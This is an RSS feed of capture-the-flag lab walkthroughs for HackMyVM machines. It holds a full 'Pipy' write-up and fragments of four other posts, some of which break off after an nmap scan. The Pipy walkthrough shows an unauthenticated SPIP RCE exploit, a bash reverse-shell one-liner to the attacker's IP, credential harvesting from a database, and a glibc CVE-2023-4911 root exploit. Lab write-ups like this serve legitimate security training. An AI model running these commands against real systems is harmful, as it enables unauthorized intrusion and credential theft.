PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
35659/tcp open  unknown
42607/tcp open  unknown
43239/tcp open  unknown
43401/tcp open  unknown
46365/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds
                                                                   
```

Ports 80, 111, 139, 445 and 2049 are the interesting ones, but I will look at the SMB service first, in case it is hiding some surprise.

---

# 2. Reconnaissance

## Port 445

PS: I am not sure whether the SMB service on this box is quirky or my attacking machine is; smbmap does not work for me, and smbclient sometimes fails to list the share. If it fails for you while reproducing, just try a few more times.

```bash
┌──(kali㉿kali)-[~/test]
└─$ smbclient //192.168.205.247/public
Password for [WORKGROUP\kali]:
Try 'help' to get a list of possible commands.
smb: \&gt; ls
  .                                   D        0  Tue Nov 28 19:57:45 2023
  ..                                  D        0  Sun Nov 26 00:19:40 2023
  new_era.txt                         N      158  Sun Nov 19 20:01:00 2023
  straton.txt                         N      718  Sun Nov 19 20:00:24 2023
  loyalty.txt                         N      931  Sun Nov 19 20:01:07 2023

                19962704 blocks of size 1024. 17182940 blocks available
smb: \&gt; get new_era.txt
getting file \new_era.txt of size 158 as new_era.txt (77.1 KiloBytes/sec) (average 77.1 KiloBytes/sec)
smb: \&gt; get straton.txt
getting file \straton.txt of size 718 as straton.txt (350.6 KiloBytes/sec) (average 213.9 KiloBytes/sec)
smb: \&gt; get loyalty.txt
getting file \loyalty.txt of size 931 as loyalty.txt (454.6 KiloBytes/sec) (average 294.1 KiloBytes/sec)
smb: \&gt; exit
                                                                                                                                     
┌──(kali㉿kali)-[~/test]
└─$ cat new_era.txt                   
Yesterday there was a big change, new government, new mayor. All citizens were reassigned their tasks. For security, every user should change their password.
                                                                                                                                     
┌──(kali㉿kali)-[~/test]
└─$ cat straton.txt
This fragment from Straton's On the Universe appears to have been of great significance both to the Progenitor and to the Founder.

AMYNTAS:        But what does this tell us about the nature of the universe, which is what we were discussing?
STRATON:        That is the next question we must undertake to answer. We begin with the self because that is what determines our existence as individuals; but the self cannot exist without that which surrounds it. The citizen lives within the city; and the city lives within the cosmos. So now we must apply the principle we have discovered to the wider world, and ask: if man is like a machine, could it be that the universe is similar in nature? And if so, what follows from that fact?
                                                                                                                                     
┌──(kali㉿kali)-[~/test]
└─$ cat loyalty.txt
This text was the source of considerable controversy in a debate between Byron (7) and Hermanubis (452).

What I propose, then, is that we are not born as entirely free agents, responsible only for ourselves. The very core of what we are, our sentience, separates us from and elevates us above the animal kingdom. As I have argued, this is not a matter of arrogance, but of responsibility.

2257686f2061726520796f752c207468656e3f22

To put it simply: each of us owes a burden of loyalty to humanity itself, to the human project across time and space. This is not a minor matter, or some abstract issue for philosophers. It is a profound and significant part of every human life. It is a universal source of meaning and insight that can bind us together and set us on a path for a brighter future; and it is also a division, a line that must held against those who preach the gospel of self-annihilation. We ignore it at our peril.
                                                                                                                                     

# new_era.txt (translated)
Yesterday there was a big change: new government, new mayor.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_Principle2.html</guid><pubDate>Thu, 20 Mar 2025 08:19:04 +0000</pubDate></item><item><title>hmv_Pipy</title><link>https://7r1UMPH.github.io/post/hmv_Pipy.html</link><description># hmv_Pipy

# 0. Introduction

**Target machine**: [hackmyvm - Pipy](https://hackmyvm.eu/machines/machine.php?vm=Pipy)
**Difficulty**: green
**Target IP**: 192.168.205.143
**Attacker IP**: 192.168.205.141

# 1. Scanning

Start with `nmap`

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.143
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-18 10:33 CST
Nmap scan report for tiny.hmv (192.168.205.143)
Host is up (0.00031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:47:C9:FD (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
```

Look at **port 80** first; **port 22** is the fallback.

# 2. Reconnaissance

![Image](https://github.com/user-attachments/assets/864afc4f-50bc-4481-9a21-60be11e82b62)

Scan for vulnerabilities (I have to say, the vulnerability scanner recommended by **Anjv-W.**, the web expert in our group chat, is really good, thumbs up 👍)

```bash
┌──(kali㉿kali)-[~/test]
└─$ nuclei -u http://192.168.205.143               

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.8

                projectdiscovery.io

[INF] Current nuclei version: v3.3.8 (latest)
[INF] Current nuclei-templates version: v10.1.1 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 154
[INF] Templates loaded for current scan: 7607
[INF] Executing 7425 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 182 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1702 (Reduced 1602 Requests)
[INF] Using Interactsh Server: oast.online
[CVE-2024-8517] [http] [critical] http://192.168.205.143/spip.ph%70?pag%65=spip_pass&amp;lang=fr
[waf-detect:apachegeneric] [http] [info] http://192.168.205.143
[openssh-detect] [tcp] [info] 192.168.205.143:22 ['SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.4']
[ssh-password-auth] [javascript] [info] 192.168.205.143:22
[ssh-sha1-hmac-algo] [javascript] [info] 192.168.205.143:22
[ssh-server-enumeration] [javascript] [info] 192.168.205.143:22 ['SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.4']
[ssh-auth-methods] [javascript] [info] 192.168.205.143:22 ['['publickey','password']']
[CVE-2023-48795] [javascript] [medium] 192.168.205.143:22 ['Vulnerable to Terrapin']
[composer-config:composer.json] [http] [info] http://192.168.205.143/composer.json
[composer-config:composer.json] [http] [info] http://192.168.205.143/vendor/composer/installed.json
[metatag-cms] [http] [info] http://192.168.205.143 ['SPIP 4.2.0']
[readme-md] [http] [info] http://192.168.205.143/README.md
[http-missing-security-headers:permissions-policy] [http] [info] http://192.168.205.143
[http-missing-security-headers:x-frame-options] [http] [info] http://192.168.205.143
[http-missing-security-headers:x-content-type-options] [http] [info] http://192.168.205.143
[http-missing-security-headers:referrer-policy] [http] [info] http://192.168.205.143
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://192.168.205.143
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://192.168.205.143
[http-missing-security-headers:strict-transport-security] [http] [info] http://192.168.205.143
[http-missing-security-headers:content-security-policy] [http] [info] http://192.168.205.143
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://192.168.205.143
[http-missing-security-headers:clear-site-data] [http] [info] http://192.168.205.143
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://192.168.205.143
[apache-detect] [http] [info] http://192.168.205.143 ['Apache/2.4.52 (Ubuntu)']
[spip-detect:spip_version] [http] [info] http://192.168.205.143 ['4.2.0']
[configuration-listing] [http] [medium] http://192.168.205.143/config/
```

There is a [CVE-2024-8517](https://github.com/Chocapikk/CVE-2024-8517) finding (the site is SPIP 4.2.0, per the `metatag-cms` and `spip-detect` lines); let's exploit it.

![Image](https://github.com/user-attachments/assets/7cd77edc-68bf-4898-847d-19a65f300d12)

Unauthenticated remote code execution, even better 🤩

```bash
git clone https://github.com/Chocapikk/CVE-2024-8517.git
cd CVE-2024-8517
python3 -m venv env
source env/bin/activate
pip install -r requirements.txt 
┌──(env)─(kali㉿kali)-[~/test/tmp/CVE-2024-8517]
└─$ python3 exploit.py -u http://192.168.205.143          
✅ Target is vulnerable! Command Output: www-data
                                                                                                                                     
ℹ  Interactive shell started. Type `exit` to quit.
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

deactivate  # leave the virtual environment
rm -rf env  # delete the virtual environment
```

Success, but we want to pop a **reverse shell** back, since the shell provided by the script is limited.

```bash
$ bash -c 'bash -i &gt;&amp; /dev/tcp/192.168.205.141/8888 0&gt;&amp;1'
```

# 3. Getting a stable shell

Once the **reverse shell** arrives, use the following commands to get a stable **interactive TTY shell** (the first line runs on the target, the next two on the attacker's listener, the rest on the target again):

```bash
script /dev/null -c bash   # on the target: wrap the shell in a pty
ctrl+z                     # on the attacker: suspend the listener
stty raw -echo; fg         # on the attacker: stop local echo, resume the listener
reset xterm                # from here on, commands run on the target
export TERM=xterm
echo $SHELL
export SHELL=/bin/bash
stty rows 59 cols 236      # match your own terminal (stty size on the attacker)
```

# 4. Privilege escalation

```bash
www-data@pipy:/var/www/html$ sudo -l
[sudo] password for www-data: 
sudo: a password is required
www-data@pipy:/var/www/html$ ls -la
total 156
drwxr-xr-x 11 www-data www-data  4096 Oct  4  2023 .
drwxr-xr-x  4 www-data www-data  4096 Oct  5  2023 ..
-rw-r--r--  1 www-data www-data  7045 Feb 23  2023 CHANGELOG.md
drwxr-xr-x  2 www-data www-data  4096 Oct  3  2023 IMG
-rw-r--r--  1 www-data www-data 35147 Feb 23  2023 LICENSE
-rw-r--r--  1 www-data www-data   842 Feb 23  2023 README.md
-rw-r--r--  1 www-data www-data   178 Feb 23  2023 SECURITY.md
-rw-r--r--  1 www-data www-data  1761 Feb 23  2023 composer.json
-rw-r--r--  1 www-data www-data 27346 Feb 23  2023 composer.lock
drwxr-xr-x  2 www-data www-data  4096 Oct  3  2023 config
drwxr-xr-x 22 www-data www-data  4096 Oct  3  2023 ecrire
-rw-r--r--  1 www-data www-data  4307 Feb 23  2023 htaccess.txt
-rw-r--r--  1 www-data www-data    42 Feb 23  2023 index.php
drwxr-xr-x  5 www-data www-data  4096 Oct  3  2023 local
drwxr-xr-x 22 www-data www-data  4096 Oct  3  2023 plugins-dist
-rw-r--r--  1 www-data www-data  3645 Feb 23  2023 plugins-dist.json
drwxr-xr-x 12 www-data www-data  4096 Oct  3  2023 prive
-rw-r--r--  1 www-data www-data   973 Feb 23  2023 spip.php
-rw-r--r--  1 www-data www-data  1212 Feb 23  2023 spip.png
-rw-r--r--  1 www-data www-data  1673 Feb 23  2023 spip.svg
drwxr-xr-x 10 www-data www-data  4096 Oct  3  2023 squelettes-dist
drwxr-xr-x  5 www-data www-data  4096 Jan 18 02:35 tmp
drwxr-xr-x  6 www-data www-data  4096 Oct  3  2023 vendor
www-data@pipy:/var/www/html$ cd config/
www-data@pipy:/var/www/html/config$ ls -al
total 48
drwxr-xr-x  2 www-data www-data  4096 Oct  3  2023 .
drwxr-xr-x 11 www-data www-data  4096 Oct  4  2023 ..
-rw-rw-rw-  1 www-data www-data   197 Oct  3  2023 .htaccess
-rw-rw-rw-  1 www-data www-data     0 Oct  3  2023 .ok
-rw-rw-rw-  1 www-data www-data   109 Oct  3  2023 chmod.php
-rw-rw-rw-  1 www-data www-data   163 Oct  3  2023 cles.php
-rw-rw-rw-  1 www-data www-data   243 Oct  3  2023 connect.php
-rw-r--r--  1 www-data www-data 17240 Feb 23  2023 ecran_securite.php
-rw-r--r--  1 www-data www-data    83 Feb 23  2023 remove.txt
www-data@pipy:/var/www/html/config$ cat connect.php
&lt;?php
if (!defined('_ECRIRE_INC_VERSION')) return;
defined('_MYSQL_SET_SQL_MODE') || define('_MYSQL_SET_SQL_MODE',true);
$GLOBALS['spip_connect_version'] = 0.8;
spip_connect_db('localhost','','root','dbpassword','spip','mysql', 'spip','','');
www-data@pipy:/var/www/html/config$ mysql -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 503
Server version: 10.6.12-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]&gt; use spip;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [spip]&gt; show tables;
+-------------------------+
| Tables_in_spip          |
+-------------------------+
| spip_articles           |
| spip_auteurs            |
| spip_auteurs_liens      |
| spip_depots             |
| spip_depots_plugins     |
| spip_documents          |
| spip_documents_liens    |
| spip_forum              |
| spip_groupes_mots       |
| spip_jobs               |
| spip_jobs_liens         |
| spip_meta               |
| spip_mots               |
| spip_mots_liens         |
| spip_paquets            |
| spip_plugins            |
| spip_referers           |
| spip_referers_articles  |
| spip_resultats          |
| spip_rubriques          |
| spip_syndic             |
| spip_syndic_articles    |
| spip_types_documents    |
| spip_urls               |
| spip_versions           |
| spip_versions_fragments |
| spip_visites            |
| spip_visites_articles   |
+-------------------------+
28 rows in set (0.000 sec)

MariaDB [spip]&gt; select * from spip_auteurs\G
*************************** 1. row ***************************
   id_auteur: 1
         nom: Angela
         bio: 
       email: angela@pipy.htb
    nom_site: 
    url_site: 
       login: angela
        pass: 4ng3l4
     low_sec: 
      statut: 0minirezo
   webmestre: oui
         maj: 2023-10-04 17:28:39
         pgp: 
      htpass: 
    en_ligne: 2023-10-04 13:50:34
 alea_actuel: 387046876651c39a45bc836.13502903
  alea_futur: 465278670651d6da4349d85.01841245
       prefs: a:4:{s:7:'couleur';i:2;s:7:'display';i:2;s:18:'display_navigation';s:22:'navigation_avec_icones';s:3:'cnx';s:0:'';}
cookie_oubli: NULL
      source: spip
        lang: 
    imessage: 
 backup_cles: 3HnqCYcjg+hKOjCODrOTwhvDGXqQ34zRxFmdchyPL7wVRW3zsPwE6+4q0GlAPo4b4OGRmzvR6NNFdEjARDtoeIAxH88cQZt2H3ENUggrz99vFfCmWHIdJgSDSOI3A3nmnfEg43BDP4q9co/AP0XIlGzGteMiSJwc0fCXOCxzCW9NwvzJYM/u/8cWGGdRALd7fzFYhOY6DmokVnIlwauc8/lwRyNbam1H6+g5ju57cI8Dzll+pCMUPhhti9RvC3WNzC2IUcPnHEM=
*************************** 2. row ***************************
   id_auteur: 2
         nom: admin
         bio: 
       email: admin@pipy.htb
    nom_site: 
    url_site: 
       login: admin
        pass: $2y$10$.GR/i2bwnVInUmzdzSi10u66AKUUWGGDBNnA7IuIeZBZVtFMqTsZ2
     low_sec: 
      statut: 1comite
   webmestre: non
         maj: 2023-10-04 17:31:03
         pgp: 
      htpass: 
    en_ligne: 2023-10-04 17:31:03
 alea_actuel: 1540227024651d7e881c21a5.84797952
  alea_futur: 439334464651da1526dbb90.67439545
       prefs: a:4:{s:7:'couleur';i:2;s:7:'display';i:2;s:18:'display_navigation';s:22:'navigation_avec_icones';s:3:'cnx';s:0:'';}
cookie_oubli: 1118839.6HqFdtVwUs3T6+AJRJOdnZG6GFPNzl4/wAh9i0D1bqfjYKMJSG63z4KPzonGgNUHz+NmYNLbcIM83Tilz5NYrlGKbw4/cDDBE1mXohDXwEDagYuW2kAUYeqd8y5XqDogNsLGEJIzn0o=
      source: spip
        lang: fr
    imessage: oui
 backup_cles: 
2 rows in set (0.000 sec)
```

Switch to `angela`: the webmaster's SPIP password `4ng3l4` sits in clear text in `spip_auteurs` and is reused for her system account.

```bash
www-data@pipy:/var/www/html/config$ su - angela
Password: 
angela@pipy:~$ id
uid=1000(angela) gid=1000(angela) groups=1000(angela)
```

Keep escalating

```bash
angela@pipy:~$ ls -la
total 40
drwxr-x--- 6 angela angela 4096 Oct 17  2023 .
drwxr-xr-x 3 root   root   4096 Oct  4  2023 ..
lrwxrwxrwx 1 angela angela    9 Oct 17  2023 .bash_history -&gt; /dev/null
-rw-r--r-- 1 angela angela  220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 angela angela 3771 Jan  6  2022 .bashrc
drwx------ 3 angela angela 4096 Oct  5  2023 .cache
drwxrwxr-x 3 angela angela 4096 Oct  3  2023 .local
-rw-r--r-- 1 angela angela  807 Jan  6  2022 .profile
drwx------ 3 angela angela 4096 Oct  3  2023 snap
drwx------ 2 angela angela 4096 Oct  2  2023 .ssh
-rw-r--r-- 1 angela angela    0 Oct  2  2023 .sudo_as_admin_successful
-rw------- 1 angela angela   33 Oct  5  2023 user.txt
angela@pipy:~$ cd /opt/
angela@pipy:/opt$ ls -al
total 8
drwxr-xr-x  2 root root 4096 Aug 10  2023 .
drwxr-xr-x 19 root root 4096 Oct  2  2023 ..
angela@pipy:/opt$ cd /tmp/
angela@pipy:/tmp$ ls -al
total 12
drwxrwxrwt  2 root     root     4096 Jan 18 02:44 .
drwxr-xr-x 19 root     root     4096 Oct  2  2023 ..
-rw-------  1 www-data www-data   19 Jan 18 02:44 phpMHrr6q
angela@pipy:/tmp$ cd /mnt/
angela@pipy:/mnt$ ls -la
total 8
drwxr-xr-x  2 root root 4096 Aug 10  2023 .
drwxr-xr-x 19 root root 4096 Oct  2  2023 ..
angela@pipy:/mnt$ find / -perm -4000 -type f 2&gt;/dev/null
/usr/libexec/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/mount
/usr/bin/chfn
/usr/bin/fusermount3
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/su
/usr/bin/pkexec
/snap/snapd/23545/usr/lib/snapd/snap-confine
/snap/snapd/20092/usr/lib/snapd/snap-confine
/snap/core20/2434/usr/bin/chfn
/snap/core20/2434/usr/bin/chsh
/snap/core20/2434/usr/bin/gpasswd
/snap/core20/2434/usr/bin/mount
/snap/core20/2434/usr/bin/newgrp
/snap/core20/2434/usr/bin/passwd
/snap/core20/2434/usr/bin/su
/snap/core20/2434/usr/bin/sudo
/snap/core20/2434/usr/bin/umount
/snap/core20/2434/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2434/usr/lib/openssh/ssh-keysign
/snap/core20/2015/usr/bin/chfn
/snap/core20/2015/usr/bin/chsh
/snap/core20/2015/usr/bin/gpasswd
/snap/core20/2015/usr/bin/mount
/snap/core20/2015/usr/bin/newgrp
/snap/core20/2015/usr/bin/passwd
/snap/core20/2015/usr/bin/su
/snap/core20/2015/usr/bin/sudo
/snap/core20/2015/usr/bin/umount
/snap/core20/2015/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2015/usr/lib/openssh/ssh-keysign
/snap/core/17200/bin/mount
/snap/core/17200/bin/ping
/snap/core/17200/bin/ping6
/snap/core/17200/bin/su
/snap/core/17200/bin/umount
/snap/core/17200/usr/bin/chfn
/snap/core/17200/usr/bin/chsh
/snap/core/17200/usr/bin/gpasswd
/snap/core/17200/usr/bin/newgrp
/snap/core/17200/usr/bin/passwd
/snap/core/17200/usr/bin/sudo
/snap/core/17200/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/17200/usr/lib/openssh/ssh-keysign
/snap/core/17200/usr/lib/snapd/snap-confine
/snap/core/17200/usr/sbin/pppd
/snap/core/16202/bin/mount
/snap/core/16202/bin/ping
/snap/core/16202/bin/ping6
/snap/core/16202/bin/su
/snap/core/16202/bin/umount
/snap/core/16202/usr/bin/chfn
/snap/core/16202/usr/bin/chsh
/snap/core/16202/usr/bin/gpasswd
/snap/core/16202/usr/bin/newgrp
/snap/core/16202/usr/bin/passwd
/snap/core/16202/usr/bin/sudo
/snap/core/16202/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/16202/usr/lib/openssh/ssh-keysign
/snap/core/16202/usr/lib/snapd/snap-confine
/snap/core/16202/usr/sbin/pppd
angela@pipy:/mnt$ /sbin/getcap -r / 2&gt;/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
/snap/core20/2434/usr/bin/ping cap_net_raw=ep
/snap/core20/2015/usr/bin/ping cap_net_raw=ep
angela@pipy:/mnt$ ss -tuln | grep tcp
tcp   LISTEN 0      80                  127.0.0.1:3306      0.0.0.0:*        
tcp   LISTEN 0      4096            127.0.0.53%lo:53        0.0.0.0:*        
tcp   LISTEN 0      128                   0.0.0.0:22        0.0.0.0:*        
tcp   LISTEN 0      1024                127.0.0.1:4226      0.0.0.0:*        
tcp   LISTEN 0      511                         *:80              *:*        
tcp   LISTEN 0      128                      [::]:22           [::]:*        
angela@pipy:/mnt$ nc
nc          nc.openbsd  
angela@pipy:/mnt$ nc 127.0.0.1 4226
a
hello
root
angela@pipy:/mnt$ ls
angela@pipy:/mnt$ nc 127.0.0.1 4226
root
admin
```

Found nothing, and there are no cron jobs either. Could it be **kernel privilege escalation**? Let's try whether an automated tool can escalate privileges.

```bash
angela@pipy:/mnt$ cd /tmp/
angela@pipy:/tmp$ wget 192.168.205.141/traitor-386
--2025-01-18 02:52:07--  http://192.168.205.141/traitor-386
Connecting to 192.168.205.141:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8475976 (8.1M) [application/octet-stream]
Saving to: ‘traitor-386’

traitor-386                                                  0%[                                                                       traitor-386                                                100%[========================================================================================================================================&gt;]   8.08M  --.-KB/s    in 0.03s   

2025-01-18 02:52:07 (282 MB/s) - ‘traitor-386’ saved [8475976/8475976]

angela@pipy:/tmp$ chmod +x traitor-386 
angela@pipy:/tmp$ ./traitor-386 -a

                                                                                                                                     
▀█▀ █▀█ ▄▀█ █ ▀█▀ █▀█ █▀█                                                                                                            
░█░ █▀▄ █▀█ █ ░█░ █▄█ █▀▄ v0.0.14                                                                                                    
https://github.com/liamg/traitor                                                                                                     
                                                                                                                                     
[+] Assessing machine state...                                                                                                       
[+] Checking for opportunities...
[+][kernel:CVE-2022-0847] Kernel version 5.15.0 is vulnerable!
[+][kernel:CVE-2022-0847] Opportunity found, trying to exploit it...
[+][kernel:CVE-2022-0847] Attempting to set root password...
[+][kernel:CVE-2022-0847] Opening '/etc/passwd' for read...
[+][kernel:CVE-2022-0847] Creating pipe...
[+][kernel:CVE-2022-0847] Determining pipe size...
[+][kernel:CVE-2022-0847] Pipe size is 65536.
[+][kernel:CVE-2022-0847] Filling pipe...
[+][kernel:CVE-2022-0847] Draining pipe...
[+][kernel:CVE-2022-0847] Pipe drained.
[+][kernel:CVE-2022-0847] Splicing data...
[+][kernel:CVE-2022-0847] Writing to dirty pipe...
[+][kernel:CVE-2022-0847] Write of '/etc/passwd' successful!
[+][kernel:CVE-2022-0847] Starting shell...
[+][kernel:CVE-2022-0847] Please exit the shell once you are finished to ensure the contents of /etc/passwd is restored.
[+][kernel:CVE-2022-0847] Setting up tty...
[+][kernel:CVE-2022-0847] Attempting authentication as root...
[+][kernel:CVE-2022-0847] Restoring contents of /etc/passwd...
[+][kernel:CVE-2022-0847] Opening '/etc/passwd' for read...
[+][kernel:CVE-2022-0847] Creating pipe...
[+][kernel:CVE-2022-0847] Determining pipe size...
[+][kernel:CVE-2022-0847] Pipe size is 65536.
[+][kernel:CVE-2022-0847] Filling pipe...
[+][kernel:CVE-2022-0847] Draining pipe...
[+][kernel:CVE-2022-0847] Pipe drained.
[+][kernel:CVE-2022-0847] Splicing data...
[+][kernel:CVE-2022-0847] Writing to dirty pipe...
[+][kernel:CVE-2022-0847] Write of '/etc/passwd' successful!
[+][error] Exploit failed: invalid password
[+] Continuing to look for opportunities
[+] Nothing found to exploit.
```

No luck, so we'll have to look ourselves.

```bash
angela@pipy:/tmp$ uname -a
Linux pipy 5.15.0-84-generic #93-Ubuntu SMP Tue Sep 5 17:16:10 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
angela@pipy:/tmp$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 22.04.3 LTS
Release:        22.04
Codename:       jammy
```

After some searching, **[CVE-2023-4911](https://github.com/leesh3288/CVE-2023-4911)** works, but a specific script is needed; some scripts don't work.

```bash
#kali
┌──(kali㉿kali)-[~/test/tmp]
└─$ wget https://github.com/leesh3288/CVE-2023-4911/archive/refs/heads/main.zip
┌──(kali㉿kali)-[~/test/tmp]
└─$ python3 -m http.server 80                                                                   
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
#target machine
angela@pipy:/tmp$ wget 192.168.205.141/main.zip
--2025-01-18 03:06:17--  http://192.168.205.141/main.zip
Connecting to 192.168.205.141:80... failed: Connection refused.
angela@pipy:/tmp$ wget 192.168.205.141/main.zip
--2025-01-18 03:06:25--  http://192.168.205.141/main.zip
Connecting to 192.168.205.141:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3044 (3.0K) [application/octet-stream]
Saving to: ‘main.zip’

main.zip                                                   0%[                                                                       main.zip.1                                                 100%[========================================================================================================================================&gt;]   2.97K  --.-KB/s    in 0s    

2025-01-18 03:06:25 (21.8 MB/s) - ‘main.zip’ saved [3044/3044]

angela@pipy:/tmp$ unzip main.zip
Archive:  main.zip
acf0d3a8bd4c437475a7c4c83f5790e53e8103cb
   creating: CVE-2023-4911-main/
  inflating: CVE-2023-4911-main/Makefile  
  inflating: CVE-2023-4911-main/README.md  
  inflating: CVE-2023-4911-main/exp.c  
  inflating: CVE-2023-4911-main/gen_libc.py  
angela@pipy:/tmp$ cd CVE-2023-4911-main/
angela@pipy:/tmp/CVE-2023-4911-main$ make
gcc -o exp exp.c
python3 gen_libc.py
[*] '/lib/x86_64-linux-gnu/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
./exp
try 100
# id
uid=0(root) gid=0(root) groups=0(root),1000(angela)

```。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_Pipy.html</guid><pubDate>Thu, 20 Mar 2025 08:18:02 +0000</pubDate></item><item><title>hmv_oliva</title><link>https://7r1UMPH.github.io/post/hmv_oliva.html</link><description># hmv_oliva

# 0. Introduction

**Target**: [hackmyvm - oliva](https://hackmyvm.eu/machines/machine.php?vm=oliva)
**Difficulty**: green
**Target IP**: 192.168.205.138
**Local IP**: 192.168.205.141

# 1. Scan

Scan with `nmap`:

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.138
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-22 08:43 CST
Nmap scan report for 192.168.205.138
Host is up (0.00029s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:84:83:23 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.44 seconds
```

The scan shows the target has **SSH** (22/tcp) and **HTTP** (80/tcp) open.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_oliva.html</guid><pubDate>Thu, 20 Mar 2025 08:17:00 +0000</pubDate></item><item><title>hmv_Minimal</title><link>https://7r1UMPH.github.io/post/hmv_Minimal.html</link><description># hmv_Minimal

# 0. Introduction

**Target**: [hackmyvm - Minimal](https://hackmyvm.eu/machines/machine.php?vm=Minimal)
**Difficulty**: yellow
**Target IP**: 192.168.205.135
**Local IP**: 192.168.205.141

# 1. Scan

Start with `nmap`

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.135
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-14 14:58 CST
Nmap scan report for 192.168.205.135
Host is up (0.00054s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:0D:67:64 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.62 seconds
```

Look at **port 80** first; **port 22** is the fallback.

# 2. Reconnaissance

![image](https://github.com/user-attachments/assets/e779669a-453f-45b8-af0d-3cbc172561ce)

(The page is quite minimal.) There is a **login page (login.php)**; I tested `weak passwords, SQL injection, and universal passwords` with no result. With no existing account, we register one ourselves.

![image](https://github.com/user-attachments/assets/d57f31d8-97d2-419e-99a0-a002e6e3086d)

After registering, some items can be added to the cart.

![image](https://github.com/user-attachments/assets/535d5286-48d7-4a29-ae43-f3ceebf03c31)

When you go to check out and click `Buy items`, you will notice the URL changes.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_Minimal.html</guid><pubDate>Thu, 20 Mar 2025 08:15:58 +0000</pubDate></item><item><title>hmv_logan2</title><link>https://7r1UMPH.github.io/post/hmv_logan2.html</link><description># hmv_logan2

# 0. Introduction

**Target**: [hackmyvm - logan2](https://hackmyvm.eu/machines/machine.php?vm=logan2)
**Difficulty**: yellow
**Target IP**: 192.168.205.144
**Local IP**: 192.168.205.141

# 1. Scan

Start with `nmap`

```
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS --min-rate 10000 -p- -Pn -sV 192.168.205.144
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-20 16:59 CST
Nmap scan report for 192.168.205.144
Host is up (0.00045s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.57 ((Debian))
3000/tcp open  http    Golang net/http server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.95%I=7%D=1/20%Time=678E107B%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,'HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request')%r(GetRequest,1000,'HTTP/1\.0\x20200\x20OK\r\nContent-Type:\
